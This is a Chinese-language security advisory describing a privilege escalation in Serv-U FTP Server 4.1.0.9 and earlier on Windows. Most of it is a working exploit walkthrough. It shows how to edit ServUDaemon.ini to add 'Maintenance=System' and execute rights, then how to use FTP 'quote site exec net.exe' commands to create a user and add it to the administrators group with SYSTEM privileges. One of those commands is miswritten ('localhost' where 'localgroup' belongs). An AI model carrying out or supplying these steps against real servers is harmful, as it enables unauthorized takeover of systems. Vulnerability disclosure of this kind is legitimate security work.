Serv-U

　　本地提升权限:是

　　远程提升权限:是

　　使用前提条件:对Serv-U配置文档有修改权限

　　声明:这只是个提升权限的思路和方法。

　　一、受影响的软件

　　Serv-U FTP Server 4.1.0.9 (连同以前任何版本)

　　二、受影响系统

　　Microsoft Windows Server 2003 任何版本

　　Microsoft Windows XP 任何版本

　　Microsoft Windows 2000 任何版本

　　Microsoft Windows NT 任何版本

　　三、综述

　　Serv-U FTP Server为RhinoSoft出品的一款Ftp Sserver软件，现在在全世界广为使用。经我研究发现，Serv-U FTP Server的配置文档存贮于Serv-U FTP Server文档目录下的ServUDaemon.ini文档中。假如本地受限用户或远程拥有普通权限的攻击者能接触到该文档并精心构造ServUDaemon.ini文档中的内容就能利用Ftp进程在系统上以SYSTEM权限执行任意命令。

　　四、缺陷分析:

　　Serv-U FTP Serve在配置用户以后会把配置信息存储和ServUDaemon.ini文档中。包括用户的权限信息和可访问目录信息。本地受限用户或是远程攻击者只要能够读写Serv-U FTP Serve的文档目录，就能够通过修改目录中的ServUDaemon.ini文档实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。并且不受系统版本的影响。(用户信息选择“存储和系统注册表中”不受此缺陷影响)

五、测试方法:

　　1、本地测试

　　假设本地受限用户能够浏览Serv-U FTP Serve的文档目录。找到ServUDaemon.ini文档。用记事本打开原文档大致内容为:

　　[GLOBAL]

　　Version=4.1.0.0 // Serv-U Ftp Server 版本号

　　ProcessID=584

　　RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/
AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo wAGnUBuycB

　　[DOMAINS]

　　Domain1=127.0.0.1||21|127.0.0.1|1|0 //主机IP连同域名，端口情况

　　[Domain1]

　　User1=zihuan|1|0

　　[USER=zihuan|1]

　　Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6

　　HomeDir=c:/ // 能够浏览的目录

　　TimeOut=600

　　Access1=C:/|RWAMLCDP

　　假如把ServUDaemon.in文档修改为:

　　[GLOBAL]

　　Version=4.1.0.0

　　ProcessID=584

　　RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/
AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo wAGnUBuycB

　　[DOMAINS]

　　Domain1=127.0.0.1||21|127.0.0.1|1|0

　　[Domain1]

　　User1=zihuan|1|0

　　[USER=zihuan|1]

　　Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6

　　HomeDir=c:/

　　TimeOut=600

　　Maintenance=System //权限类型

　　Access1=C:/|RWAMELCDP

以上内容比原内容多了一句“Maintenance=System”修改完成后保存。然后在用Ftp登陆到Serv-U FTP Server以后执行如下命令:

　　ftp>open ip

　　Connected to ip.

　　220 Serv-U FTP Server v4.1.0.0 for WinSock ready...

　　User (ip:(none)): id //输入构造的用户

　　331 User name okay， please send complete E-mail address as password.

　　Password:password //密码

　　230 User logged in， proceed.

　　ftp> cd winnt //进入win2k的winnt目录，假如是winxp或是windows server 2003就应该为windows目录。

　　250 Directory changed to /WINNT

　　ftp>cd system32 //进入system32目录

　　250 Directory changed to /WINNT/system32

　　ftp>quote site exec net.exe user zihuan ziHUAN /add //利用系统的net.exe文档加用户。

　　200 EXEC command successful (TID=33).

　　ftp>quote site exec net.exe localhost administrators zihuan /add //提升为终极用户

　　这样就在本地系统上加了一个为zihuan密码为:ziHUAN的终极用户。也能够直接用quote site exec net.exe localhost administrators user /add命令把当前用户提升到终极用户组中去。当然也能够在系统上执行任何命令。

　　声明:

　　本本仅用来描述可能存在的安全问题，作者本人和黑客X档案杂志社不为此安全公告提供任何确保或承诺。由于传播、利用此文章提供的信息而造成的任何直接或间接的后果及损失，均由使用者本人负责，本文作者不为此承担任何责任。作者拥有对此安全公告的修改和解释权。如欲转载或传播此文章，必须确保此文章的完整性，包括版权声明等全部内容。未经作者本人允许，不得任意修改或增减此文章公告内容。